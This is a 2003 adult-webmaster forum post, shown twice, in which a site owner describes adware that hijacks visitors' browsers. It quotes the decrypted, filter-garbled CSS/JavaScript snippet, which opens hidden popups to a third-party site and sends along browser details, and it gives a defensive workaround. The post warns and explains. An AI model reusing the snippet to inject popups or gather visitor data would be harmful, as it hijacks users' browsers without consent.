GoFuckYourself.com - Adult Webmaster Forum - View Single Post

The Hun · 09-25-2003, 01:27 AM

I got more and more complaints about consoles on my site. By now we all know Xrenoder and his HOSTS file trick, people are well aware of that problem now, but I found this new one. You might want to warn your visitors... and if possible, apply a simple fix I applied to my page, which completely solved the problem (for now)...

A user reported a file being installed on his machine which popped the site datanotary.com. This user sent me the files he found, it contained the following code (after decrypting):

img{behavior:url(#default#clientCaps);background-color

this.althahahaha"SURF IN STYLE... THE SEX TRACKER!") ? ( (window.open('http://datanotary.com/gallery/?r=vad&c='+thishahahahahahahahaEnabled+'&l='+this. userLanguage+'&m='+this.connectionType,'','x=5000, top=5000,y=5000,left=5000,height=600,width=800,dir ectories=yes,toolbar=yes,status=yes, location=yes,resizable=yes,menubar=yes,scrollbars= yes')) ? this.alt="SURF IN STYLE.. THE SEX TRACKER!" : '' ) : ''

(I see the GFY engine added some hahaha's to this code, but the point is clear)

The code is automatically attached to every site visited. Basically what this does is, as soon as the code finds an image with the alt "SURF IN STYLE... THE SEX TRACKER!" it pops a console to datanotary.com, it then changes the alt from having three points to two to make sure it doesn't kill itself in a loop.

The solution is easy: change the alt of sextracker from having three points to two and your users no longer have the console. In the mean time I advice sextracker to take legal action against datanotary.com. I'll be putting some information on the Hun's Gazette (www.thehun.net/gazette) for people so they can fix the problem in case they have it. And I'll be changing the alt-text of the sextracker counter.

09-25-2003, 01:27 AM
The Hun Confirmed User Join Date: Jan 2001 Location: The Netherlands Posts: 1,207	Sextracker abused by hackers I got more and more complaints about consoles on my site. By now we all know Xrenoder and his HOSTS file trick, people are well aware of that problem now, but I found this new one. You might want to warn your visitors... and if possible, apply a simple fix I applied to my page, which completely solved the problem (for now)... A user reported a file being installed on his machine which popped the site datanotary.com. This user sent me the files he found, it contained the following code (after decrypting): img{behavior:url(#default#clientCaps);background-colorthis.althahahaha"SURF IN STYLE... THE SEX TRACKER!") ? ( (window.open('http://datanotary.com/gallery/?r=vad&c='+thishahahahahahahahaEnabled+'&l='+this. userLanguage+'&m='+this.connectionType,'','x=5000, top=5000,y=5000,left=5000,height=600,width=800,dir ectories=yes,toolbar=yes,status=yes, location=yes,resizable=yes,menubar=yes,scrollbars= yes')) ? this.alt="SURF IN STYLE.. THE SEX TRACKER!" : '' ) : '' (I see the GFY engine added some hahaha's to this code, but the point is clear) The code is automatically attached to every site visited. Basically what this does is, as soon as the code finds an image with the alt "SURF IN STYLE... THE SEX TRACKER!" it pops a console to datanotary.com, it then changes the alt from having three points to two to make sure it doesn't kill itself in a loop. The solution is easy: change the alt of sextracker from having three points to two and your users no longer have the console. In the mean time I advice sextracker to take legal action against datanotary.com. I'll be putting some information on the Hun's Gazette (www.thehun.net/gazette) for people so they can fix the problem in case they have it. And I'll be changing the alt-text of the sextracker counter.